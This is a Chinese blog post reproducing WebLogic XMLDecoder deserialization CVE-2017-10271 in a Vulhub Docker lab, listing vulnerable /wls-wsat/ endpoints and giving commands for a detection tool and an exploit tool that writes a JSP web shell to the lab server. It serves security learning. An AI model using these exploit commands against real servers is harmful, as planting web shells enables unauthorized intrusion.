weblogic XMLDecoder反序列化 CVE-2017-10271 工具检测+工具利用复现

被360众测靶场残虐,所以决定把这些常规漏洞(Vulhub)都学一下他们的利用。

环境:

docker   搭建weblogic  XMLDecoder反序列化环境 

kali虚拟机

本地物理机Win10  谷歌浏览器  Git Bash

工具:https://github.com/RealBearcat/Oracle-WebLogic-CVE-2017-10271

 环境搭建:

git clone https://github.com/vulhub/vulhub.git     #可以看到有很多漏洞环境

 

 我这个是从一个安装包解压来的,不过都是一样的,上面给的方式更方便一些,如果你可以科学&上网的话。

cd vulhub/weblogic/CVE-2017-10271  #选中这一目录  进去开启漏洞环境

docker-compose  build  #此处出现过一个坑 有可能会报一下错误    

 

 错误原因是有一个编译包中缺少一个py模块,解决方式

docker-compose up -d   #部署开启漏洞环境如下   要是不知道网址 可以ifconfig一下

  

 检测:检测其实不太重要,因为这个漏洞是weblogic系列的,大家一般都会有这一系的检测工具

手动检测:访问这些目录  出现下图就说明大可能存在

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

 工具检测:

java  -jar WebLogic-Wls-wsat-XMLDecoder.jar  -u http://192.168.80.1:7001

工具利用:写命令shell

java  -jar  WebLogic_Wls-Wsat_RCE_Exp.jar http://192.168.80.129:7001 z.jsp    #后面的z.jsp名字可以自己起   jsp后缀不能变

 尝试浏览器连接:

 

原文地址:https://www.cnblogs.com/Qiuzhiyu/p/13574195.html